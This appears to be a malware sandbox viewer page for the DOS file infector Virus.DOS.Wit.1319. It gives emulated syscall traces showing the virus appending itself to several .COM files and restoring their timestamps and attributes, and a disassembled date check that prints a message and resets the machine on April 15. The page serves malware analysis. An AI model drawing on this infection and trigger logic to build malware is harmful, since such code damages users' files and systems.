Sample viewer

vx.netlux.org/Virus.DOS.Wit.1319

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:11:15.402020977Z 26 PC: 12ad9 | Set disk transfer address
2018-12-17T23:11:15.404107898Z 71 PC: 12aeb | Get current directory
2018-12-17T23:11:15.407230088Z 42 PC: 12af1 | Get date 0x12af1: cmp dh, 4
0x12af4: jne 0x12b0f
0x12af6: cmp dl, 0xf
0x12af9: jne 0x12b0f
0x12afb: mov ax, 0x1010
0x12afe: out 0x70, ax
0x12b00: mov dx, 0x505
0x12b03: mov ah, 9
0x12b05: int 0x21
0x12b07: mov ah, 8
0x12b09: int 0x21
0x12b0b: mov al, 0xfe
0x12b0d: out 0x64, al
0x12b0f: mov dx, 0x4f3
0x12b12: mov ah, byte ptr [0x5e9]
0x12b16: mov cl, 7
0x12b18: int 0x21
0x12b1a: jae 0x12b1f
0x12b1c: jmp 0x12d8f
0x12b1f: mov dx, word ptr [0x528]
2018-12-17T23:11:15.409404678Z 78 PC: 12b1a | Find first file
2018-12-17T23:11:15.417867379Z 67 PC: 12b36 | Get or set file attributes
2018-12-17T23:11:15.439936622Z 61 PC: 12b58 | Open file (Filename = 'SLEEP.COM')
2018-12-17T23:11:15.446823415Z 63 PC: 12b74 | Read file or device (Read 1316 bytes on handle 5)
2018-12-17T23:11:15.454343428Z 66 PC: 12b9f | Move file pointer
2018-12-17T23:11:15.455845407Z 66 PC: 12bc0 | Move file pointer
2018-12-17T23:11:15.457205651Z 64 PC: 12bdb | Write file or device (Write 407 bytes on handle 5)
2018-12-17T23:11:15.466217994Z 64 PC: 12beb | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:11:15.469342462Z 66 PC: 12c31 | Move file pointer
2018-12-17T23:11:15.47096922Z 64 PC: 12c42 | Write file or device (Write 1316 bytes on handle 5)
2018-12-17T23:11:15.479507971Z 87 PC: 12c53 | Get or set file date and time
2018-12-17T23:11:15.48185207Z 67 PC: 12c65 | Get or set file attributes
2018-12-17T23:11:15.492265324Z 62 PC: 12c6b | Close file
2018-12-17T23:11:15.499417209Z 79 PC: 12b1a | Find next file
2018-12-17T23:11:15.503094988Z 67 PC: 12b36 | Get or set file attributes
2018-12-17T23:11:15.512857491Z 61 PC: 12b58 | Open file (Filename = 'PRINT.COM')
2018-12-17T23:11:15.519513254Z 63 PC: 12b74 | Read file or device (Read 1316 bytes on handle 5)
2018-12-17T23:11:15.526834019Z 66 PC: 12b9f | Move file pointer
2018-12-17T23:11:15.528543012Z 66 PC: 12bc0 | Move file pointer
2018-12-17T23:11:15.530997359Z 64 PC: 12bdb | Write file or device (Write 27 bytes on handle 5)
2018-12-17T23:11:15.536328034Z 64 PC: 12beb | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:11:15.539983282Z 66 PC: 12c31 | Move file pointer
2018-12-17T23:11:15.541754037Z 64 PC: 12c42 | Write file or device (Write 1316 bytes on handle 5)
2018-12-17T23:11:15.552080148Z 87 PC: 12c53 | Get or set file date and time
2018-12-17T23:11:15.55410601Z 67 PC: 12c65 | Get or set file attributes
2018-12-17T23:11:15.565457992Z 62 PC: 12c6b | Close file
2018-12-17T23:11:15.5732753Z 79 PC: 12b1a | Find next file
2018-12-17T23:11:15.576320353Z 67 PC: 12b36 | Get or set file attributes
2018-12-17T23:11:15.586331805Z 61 PC: 12b58 | Open file (Filename = 'HELLO.COM')
2018-12-17T23:11:15.593710021Z 63 PC: 12b74 | Read file or device (Read 1316 bytes on handle 5)
2018-12-17T23:11:15.600879309Z 66 PC: 12b9f | Move file pointer
2018-12-17T23:11:15.602642908Z 66 PC: 12bc0 | Move file pointer
2018-12-17T23:11:15.604367837Z 64 PC: 12bdb | Write file or device (Write 92 bytes on handle 5)
2018-12-17T23:11:15.609005249Z 64 PC: 12beb | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:11:15.612106338Z 66 PC: 12c31 | Move file pointer
2018-12-17T23:11:15.613734621Z 64 PC: 12c42 | Write file or device (Write 1316 bytes on handle 5)
2018-12-17T23:11:15.622176816Z 87 PC: 12c53 | Get or set file date and time
2018-12-17T23:11:15.623643042Z 67 PC: 12c65 | Get or set file attributes
2018-12-17T23:11:15.634951943Z 62 PC: 12c6b | Close file
2018-12-17T23:11:15.642686953Z 79 PC: 12b1a | Find next file
2018-12-17T23:11:15.645700938Z 67 PC: 12b36 | Get or set file attributes
2018-12-17T23:11:15.65606918Z 61 PC: 12b58 | Open file (Filename = 'PHANG.COM')
2018-12-17T23:11:15.663433271Z 63 PC: 12b74 | Read file or device (Read 1316 bytes on handle 5)
2018-12-17T23:11:15.670394786Z 66 PC: 12b9f | Move file pointer
2018-12-17T23:11:15.672185475Z 66 PC: 12bc0 | Move file pointer
2018-12-17T23:11:15.67448731Z 64 PC: 12bdb | Write file or device (Write 29 bytes on handle 5)
2018-12-17T23:11:15.678533472Z 64 PC: 12beb | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:11:15.681650607Z 66 PC: 12c31 | Move file pointer
2018-12-17T23:11:15.683790046Z 64 PC: 12c42 | Write file or device (Write 1316 bytes on handle 5)
2018-12-17T23:11:15.691484591Z 87 PC: 12c53 | Get or set file date and time
2018-12-17T23:11:15.693135882Z 67 PC: 12c65 | Get or set file attributes
2018-12-17T23:11:15.703997523Z 62 PC: 12c6b | Close file
2018-12-17T23:11:15.71144843Z 79 PC: 12b1a | Find next file
2018-12-17T23:11:15.714950607Z 67 PC: 12b36 | Get or set file attributes
2018-12-17T23:11:15.727389615Z 61 PC: 12b58 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T23:11:15.735465325Z 63 PC: 12b74 | Read file or device (Read 1316 bytes on handle 5)
2018-12-17T23:11:15.742447688Z 66 PC: 12b9f | Move file pointer
2018-12-17T23:11:15.745609096Z 66 PC: 12bc0 | Move file pointer
2018-12-17T23:11:15.747662889Z 64 PC: 12bdb | Write file or device (Write 29 bytes on handle 5)
2018-12-17T23:11:15.751935546Z 64 PC: 12beb | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:11:15.756021138Z 66 PC: 12c31 | Move file pointer
2018-12-17T23:11:15.758165369Z 64 PC: 12c42 | Write file or device (Write 1316 bytes on handle 5)
2018-12-17T23:11:15.766979863Z 87 PC: 12c53 | Get or set file date and time
2018-12-17T23:11:15.769668622Z 67 PC: 12c65 | Get or set file attributes
2018-12-17T23:11:15.780726309Z 62 PC: 12c6b | Close file
2018-12-17T23:11:15.787910823Z 78 PC: 12b1a | Find first file
2018-12-17T23:11:15.795342963Z 78 PC: 12cd0 | Find first file
2018-12-17T23:11:15.802133708Z 78 PC: 12cd0 | Find first file
2018-12-17T23:11:15.808263812Z 78 PC: 12cd0 | Find first file
2018-12-17T23:11:15.814886791Z 78 PC: 12cd0 | Find first file
2018-12-17T23:11:15.821698487Z 78 PC: 12cd0 | Find first file
2018-12-17T23:11:15.828010327Z 78 PC: 12cd0 | Find first file
2018-12-17T23:11:15.83426106Z 78 PC: 12cd0 | Find first file
2018-12-17T23:11:15.841082013Z 78 PC: 12cd0 | Find first file
2018-12-17T23:11:15.84701628Z 78 PC: 12cd0 | Find first file
2018-12-17T23:11:15.852928284Z 59 PC: 12db4 | Change current directory
2018-12-17T23:11:15.858262236Z 26 PC: 12dd1 | Set disk transfer address
2018-12-17T23:11:15.859593847Z 59 PC: 12ddc | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":17132,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:54:58.684793774Z 26 PC: 12ad9 | Set disk transfer address
2018-12-25T12:54:58.686269073Z 71 PC: 12aeb | Get current directory
2018-12-25T12:54:58.688320631Z 42 PC: 12af1 | Get date 0x12af1: cmp dh, 4
0x12af4: jne 0x12b0f
0x12af6: cmp dl, 0xf
0x12af9: jne 0x12b0f
0x12afb: mov ax, 0x1010
0x12afe: out 0x70, ax
0x12b00: mov dx, 0x505
0x12b03: mov ah, 9
0x12b05: int 0x21
0x12b07: mov ah, 8
0x12b09: int 0x21
0x12b0b: mov al, 0xfe
0x12b0d: out 0x64, al
0x12b0f: mov dx, 0x4f3
0x12b12: mov ah, byte ptr [0x5e9]
0x12b16: mov cl, 7
0x12b18: int 0x21
0x12b1a: jae 0x12b1f
0x12b1c: jmp 0x12d8f
0x12b1f: mov dx, word ptr [0x528]
2018-12-25T12:54:58.690605297Z 78 PC: 12b1a | Find first file
2018-12-25T12:54:58.697538721Z 67 PC: 12b36 | Get or set file attributes
2018-12-25T12:54:58.711606106Z 61 PC: 12b58 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:54:58.715887632Z 63 PC: 12b74 | Read file or device (Read 1316 bytes on handle 5)
2018-12-25T12:54:58.720193567Z 66 PC: 12b9f | Move file pointer
2018-12-25T12:54:58.721963369Z 66 PC: 12bc0 | Move file pointer
2018-12-25T12:54:58.723088631Z 64 PC: 12bdb | Write file or device (Write 407 bytes on handle 5)
2018-12-25T12:54:58.728348572Z 64 PC: 12beb | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:54:58.731144305Z 66 PC: 12c31 | Move file pointer
2018-12-25T12:54:58.732195751Z 64 PC: 12c42 | Write file or device (Write 1316 bytes on handle 5)
2018-12-25T12:54:58.737560773Z 87 PC: 12c53 | Get or set file date and time
2018-12-25T12:54:58.739049164Z 67 PC: 12c65 | Get or set file attributes
2018-12-25T12:54:58.746184894Z 62 PC: 12c6b | Close file
2018-12-25T12:54:58.752704563Z 79 PC: 12b1a | Find next file (See above)
2018-12-25T12:54:58.755081516Z 67 PC: 12b36 | Get or set file attributes (See above)
2018-12-25T12:54:58.761829129Z 61 PC: 12b58 | Open file (See above)
2018-12-25T12:54:58.766229069Z 63 PC: 12b74 | Read file or device (See above)
2018-12-25T12:54:58.770783115Z 66 PC: 12b9f | Move file pointer (See above)
2018-12-25T12:54:58.772667663Z 66 PC: 12bc0 | Move file pointer (See above)
2018-12-25T12:54:58.773877486Z 64 PC: 12bdb | Write file or device (See above)
2018-12-25T12:54:58.776546547Z 64 PC: 12beb | Write file or device (See above)
2018-12-25T12:54:58.77917729Z 66 PC: 12c31 | Move file pointer (See above)
2018-12-25T12:54:58.780699729Z 64 PC: 12c42 | Write file or device (See above)
2018-12-25T12:54:58.785789756Z 87 PC: 12c53 | Get or set file date and time (See above)
2018-12-25T12:54:58.787833393Z 67 PC: 12c65 | Get or set file attributes (See above)
2018-12-25T12:54:58.795312996Z 62 PC: 12c6b | Close file (See above)
2018-12-25T12:54:58.80012202Z 79 PC: 12b1a | Find next file (See above)
2018-12-25T12:54:58.80409202Z 67 PC: 12b36 | Get or set file attributes (See above)
2018-12-25T12:54:58.815365538Z 61 PC: 12b58 | Open file (See above)
2018-12-25T12:54:58.823599654Z 63 PC: 12b74 | Read file or device (See above)
2018-12-25T12:54:58.82996583Z 66 PC: 12b9f | Move file pointer (See above)
2018-12-25T12:54:58.831961567Z 66 PC: 12bc0 | Move file pointer (See above)
2018-12-25T12:54:58.833884732Z 64 PC: 12bdb | Write file or device (See above)
2018-12-25T12:54:58.839353865Z 64 PC: 12beb | Write file or device (See above)
2018-12-25T12:54:58.843080537Z 66 PC: 12c31 | Move file pointer (See above)
2018-12-25T12:54:58.844962884Z 64 PC: 12c42 | Write file or device (See above)
2018-12-25T12:54:58.853563294Z 87 PC: 12c53 | Get or set file date and time (See above)
2018-12-25T12:54:58.855606244Z 67 PC: 12c65 | Get or set file attributes (See above)
2018-12-25T12:54:58.867183716Z 62 PC: 12c6b | Close file (See above)
2018-12-25T12:54:58.87482282Z 79 PC: 12b1a | Find next file (See above)
2018-12-25T12:54:58.878765793Z 67 PC: 12b36 | Get or set file attributes (See above)
2018-12-25T12:54:58.890642166Z 61 PC: 12b58 | Open file (See above)
2018-12-25T12:54:58.899082231Z 63 PC: 12b74 | Read file or device (See above)
2018-12-25T12:54:58.907063377Z 66 PC: 12b9f | Move file pointer (See above)
2018-12-25T12:54:58.908746392Z 66 PC: 12bc0 | Move file pointer (See above)
2018-12-25T12:54:58.91032772Z 64 PC: 12bdb | Write file or device (See above)
2018-12-25T12:54:58.914905373Z 64 PC: 12beb | Write file or device (See above)
2018-12-25T12:54:58.917930185Z 66 PC: 12c31 | Move file pointer (See above)
2018-12-25T12:54:58.919301963Z 64 PC: 12c42 | Write file or device (See above)
2018-12-25T12:54:58.928739937Z 87 PC: 12c53 | Get or set file date and time (See above)
2018-12-25T12:54:58.930389156Z 67 PC: 12c65 | Get or set file attributes (See above)
2018-12-25T12:54:58.942894862Z 62 PC: 12c6b | Close file (See above)
2018-12-25T12:54:58.950782374Z 79 PC: 12b1a | Find next file (See above)
2018-12-25T12:54:58.953586989Z 67 PC: 12b36 | Get or set file attributes (See above)
2018-12-25T12:54:58.96460773Z 61 PC: 12b58 | Open file (See above)
2018-12-25T12:54:58.972446494Z 63 PC: 12b74 | Read file or device (See above)
2018-12-25T12:54:58.979518973Z 66 PC: 12b9f | Move file pointer (See above)
2018-12-25T12:54:58.981485932Z 66 PC: 12bc0 | Move file pointer (See above)
2018-12-25T12:54:58.983645669Z 64 PC: 12bdb | Write file or device (See above)
2018-12-25T12:54:58.987900679Z 64 PC: 12beb | Write file or device (See above)
2018-12-25T12:54:58.990898353Z 66 PC: 12c31 | Move file pointer (See above)
2018-12-25T12:54:58.992185798Z 64 PC: 12c42 | Write file or device (See above)
2018-12-25T12:54:59.002003894Z 87 PC: 12c53 | Get or set file date and time (See above)
2018-12-25T12:54:59.004138873Z 67 PC: 12c65 | Get or set file attributes (See above)
2018-12-25T12:54:59.016502771Z 62 PC: 12c6b | Close file (See above)
2018-12-25T12:54:59.026138879Z 78 PC: 12b1a | Find first file (See above)
2018-12-25T12:54:59.032564558Z 78 PC: 12cd0 | Find first file
2018-12-25T12:54:59.039143867Z 78 PC: 12cd0 | Find first file (See above)
2018-12-25T12:54:59.046212554Z 78 PC: 12cd0 | Find first file (See above)
2018-12-25T12:54:59.05281082Z 78 PC: 12cd0 | Find first file (See above)
2018-12-25T12:54:59.06500592Z 78 PC: 12cd0 | Find first file (See above)
2018-12-25T12:54:59.07848023Z 78 PC: 12cd0 | Find first file (See above)
2018-12-25T12:54:59.085982719Z 78 PC: 12cd0 | Find first file (See above)
2018-12-25T12:54:59.092541041Z 78 PC: 12cd0 | Find first file (See above)
2018-12-25T12:54:59.099312674Z 78 PC: 12cd0 | Find first file (See above)
2018-12-25T12:54:59.106730512Z 59 PC: 12db4 | Change current directory
2018-12-25T12:54:59.111537206Z 26 PC: 12dd1 | Set disk transfer address
2018-12-25T12:54:59.113083204Z 59 PC: 12ddc | Change current directory

{"DateBased":true,"Day":1,"Month":4,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":17132,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:54:59.391247624Z 26 PC: 12ad9 | Set disk transfer address
2018-12-25T12:54:59.39315955Z 71 PC: 12aeb | Get current directory
2018-12-25T12:54:59.396472237Z 42 PC: 12af1 | Get date 0x12af1: cmp dh, 4
0x12af4: jne 0x12b0f
0x12af6: cmp dl, 0xf
0x12af9: jne 0x12b0f
0x12afb: mov ax, 0x1010
0x12afe: out 0x70, ax
0x12b00: mov dx, 0x505
0x12b03: mov ah, 9
0x12b05: int 0x21
0x12b07: mov ah, 8
0x12b09: int 0x21
0x12b0b: mov al, 0xfe
0x12b0d: out 0x64, al
0x12b0f: mov dx, 0x4f3
0x12b12: mov ah, byte ptr [0x5e9]
0x12b16: mov cl, 7
0x12b18: int 0x21
0x12b1a: jae 0x12b1f
0x12b1c: jmp 0x12d8f
0x12b1f: mov dx, word ptr [0x528]
2018-12-25T12:54:59.399663599Z 78 PC: 12b1a | Find first file
2018-12-25T12:54:59.406823793Z 67 PC: 12b36 | Get or set file attributes
2018-12-25T12:54:59.60939655Z 61 PC: 12b58 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:54:59.617001809Z 63 PC: 12b74 | Read file or device (Read 1316 bytes on handle 5)
2018-12-25T12:54:59.624495281Z 66 PC: 12b9f | Move file pointer
2018-12-25T12:54:59.626924556Z 66 PC: 12bc0 | Move file pointer
2018-12-25T12:54:59.628536506Z 64 PC: 12bdb | Write file or device (Write 407 bytes on handle 5)
2018-12-25T12:54:59.637645403Z 64 PC: 12beb | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:54:59.641827004Z 66 PC: 12c31 | Move file pointer
2018-12-25T12:54:59.6440695Z 64 PC: 12c42 | Write file or device (Write 1316 bytes on handle 5)
2018-12-25T12:54:59.654784688Z 87 PC: 12c53 | Get or set file date and time
2018-12-25T12:54:59.665450851Z 67 PC: 12c65 | Get or set file attributes
2018-12-25T12:54:59.677700926Z 62 PC: 12c6b | Close file
2018-12-25T12:54:59.685746324Z 79 PC: 12b1a | Find next file (See above)
2018-12-25T12:54:59.689357613Z 67 PC: 12b36 | Get or set file attributes (See above)
2018-12-25T12:54:59.697204894Z 61 PC: 12b58 | Open file (See above)
2018-12-25T12:54:59.701455876Z 63 PC: 12b74 | Read file or device (See above)
2018-12-25T12:54:59.705640242Z 66 PC: 12b9f | Move file pointer (See above)
2018-12-25T12:54:59.707720226Z 66 PC: 12bc0 | Move file pointer (See above)
2018-12-25T12:54:59.709024139Z 64 PC: 12bdb | Write file or device (See above)
2018-12-25T12:54:59.711694602Z 64 PC: 12beb | Write file or device (See above)
2018-12-25T12:54:59.714205739Z 66 PC: 12c31 | Move file pointer (See above)
2018-12-25T12:54:59.715471223Z 64 PC: 12c42 | Write file or device (See above)
2018-12-25T12:54:59.720695669Z 87 PC: 12c53 | Get or set file date and time (See above)
2018-12-25T12:54:59.722827809Z 67 PC: 12c65 | Get or set file attributes (See above)
2018-12-25T12:54:59.735408673Z 62 PC: 12c6b | Close file (See above)
2018-12-25T12:54:59.743449776Z 79 PC: 12b1a | Find next file (See above)
2018-12-25T12:54:59.747816818Z 67 PC: 12b36 | Get or set file attributes (See above)
2018-12-25T12:54:59.758805626Z 61 PC: 12b58 | Open file (See above)
2018-12-25T12:54:59.76633279Z 63 PC: 12b74 | Read file or device (See above)
2018-12-25T12:54:59.773317271Z 66 PC: 12b9f | Move file pointer (See above)
2018-12-25T12:54:59.775068057Z 66 PC: 12bc0 | Move file pointer (See above)
2018-12-25T12:54:59.776623247Z 64 PC: 12bdb | Write file or device (See above)
2018-12-25T12:54:59.780856448Z 64 PC: 12beb | Write file or device (See above)
2018-12-25T12:54:59.784586143Z 66 PC: 12c31 | Move file pointer (See above)
2018-12-25T12:54:59.786384343Z 64 PC: 12c42 | Write file or device (See above)
2018-12-25T12:54:59.795513383Z 87 PC: 12c53 | Get or set file date and time (See above)
2018-12-25T12:54:59.798089293Z 67 PC: 12c65 | Get or set file attributes (See above)
2018-12-25T12:54:59.810726625Z 62 PC: 12c6b | Close file (See above)
2018-12-25T12:54:59.819462476Z 79 PC: 12b1a | Find next file (See above)
2018-12-25T12:54:59.823652258Z 67 PC: 12b36 | Get or set file attributes (See above)
2018-12-25T12:54:59.834820206Z 61 PC: 12b58 | Open file (See above)
2018-12-25T12:54:59.842128129Z 63 PC: 12b74 | Read file or device (See above)
2018-12-25T12:54:59.849581305Z 66 PC: 12b9f | Move file pointer (See above)
2018-12-25T12:54:59.851367889Z 66 PC: 12bc0 | Move file pointer (See above)
2018-12-25T12:54:59.852918116Z 64 PC: 12bdb | Write file or device (See above)
2018-12-25T12:54:59.857197098Z 64 PC: 12beb | Write file or device (See above)
2018-12-25T12:54:59.860845822Z 66 PC: 12c31 | Move file pointer (See above)
2018-12-25T12:54:59.862329337Z 64 PC: 12c42 | Write file or device (See above)
2018-12-25T12:54:59.871021078Z 87 PC: 12c53 | Get or set file date and time (See above)
2018-12-25T12:54:59.873096073Z 67 PC: 12c65 | Get or set file attributes (See above)
2018-12-25T12:54:59.88444149Z 62 PC: 12c6b | Close file (See above)
2018-12-25T12:54:59.891825714Z 79 PC: 12b1a | Find next file (See above)
2018-12-25T12:54:59.895221443Z 67 PC: 12b36 | Get or set file attributes (See above)
2018-12-25T12:54:59.905706684Z 61 PC: 12b58 | Open file (See above)
2018-12-25T12:54:59.916914657Z 63 PC: 12b74 | Read file or device (See above)
2018-12-25T12:54:59.926895172Z 66 PC: 12b9f | Move file pointer (See above)
2018-12-25T12:54:59.929011899Z 66 PC: 12bc0 | Move file pointer (See above)
2018-12-25T12:54:59.930995218Z 64 PC: 12bdb | Write file or device (See above)
2018-12-25T12:54:59.937473523Z 64 PC: 12beb | Write file or device (See above)
2018-12-25T12:54:59.940993134Z 66 PC: 12c31 | Move file pointer (See above)
2018-12-25T12:54:59.94289295Z 64 PC: 12c42 | Write file or device (See above)
2018-12-25T12:54:59.952756977Z 87 PC: 12c53 | Get or set file date and time (See above)
2018-12-25T12:54:59.955244112Z 67 PC: 12c65 | Get or set file attributes (See above)
2018-12-25T12:54:59.967295252Z 62 PC: 12c6b | Close file (See above)
2018-12-25T12:54:59.975224997Z 78 PC: 12b1a | Find first file (See above)
2018-12-25T12:54:59.982599675Z 78 PC: 12cd0 | Find first file
2018-12-25T12:54:59.990189779Z 78 PC: 12cd0 | Find first file (See above)
2018-12-25T12:54:59.997896157Z 78 PC: 12cd0 | Find first file (See above)
2018-12-25T12:55:00.005729078Z 78 PC: 12cd0 | Find first file (See above)
2018-12-25T12:55:00.012269253Z 78 PC: 12cd0 | Find first file (See above)
2018-12-25T12:55:00.020638255Z 78 PC: 12cd0 | Find first file (See above)
2018-12-25T12:55:00.028395755Z 78 PC: 12cd0 | Find first file (See above)
2018-12-25T12:55:00.035593807Z 78 PC: 12cd0 | Find first file (See above)
2018-12-25T12:55:00.042907752Z 78 PC: 12cd0 | Find first file (See above)
2018-12-25T12:55:00.050208029Z 59 PC: 12db4 | Change current directory
2018-12-25T12:55:00.054878004Z 26 PC: 12dd1 | Set disk transfer address
2018-12-25T12:55:00.056165829Z 59 PC: 12ddc | Change current directory

{"DateBased":true,"Day":15,"Month":4,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":17132,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:54:59.548922503Z 26 PC: 12ad9 | Set disk transfer address
2018-12-25T12:54:59.551301947Z 71 PC: 12aeb | Get current directory
2018-12-25T12:54:59.554884787Z 42 PC: 12af1 | Get date 0x12af1: cmp dh, 4
0x12af4: jne 0x12b0f
0x12af6: cmp dl, 0xf
0x12af9: jne 0x12b0f
0x12afb: mov ax, 0x1010
0x12afe: out 0x70, ax
0x12b00: mov dx, 0x505
0x12b03: mov ah, 9
0x12b05: int 0x21
0x12b07: mov ah, 8
0x12b09: int 0x21
0x12b0b: mov al, 0xfe
0x12b0d: out 0x64, al
0x12b0f: mov dx, 0x4f3
0x12b12: mov ah, byte ptr [0x5e9]
0x12b16: mov cl, 7
0x12b18: int 0x21
0x12b1a: jae 0x12b1f
0x12b1c: jmp 0x12d8f
0x12b1f: mov dx, word ptr [0x528]
2018-12-25T12:54:59.557668632Z 9 PC: 12b07 | Display string (String= '��ࠡ���� - rulez forever ! ')
2018-12-25T12:54:59.562604354Z 8 PC: 12b0b | Console input without echo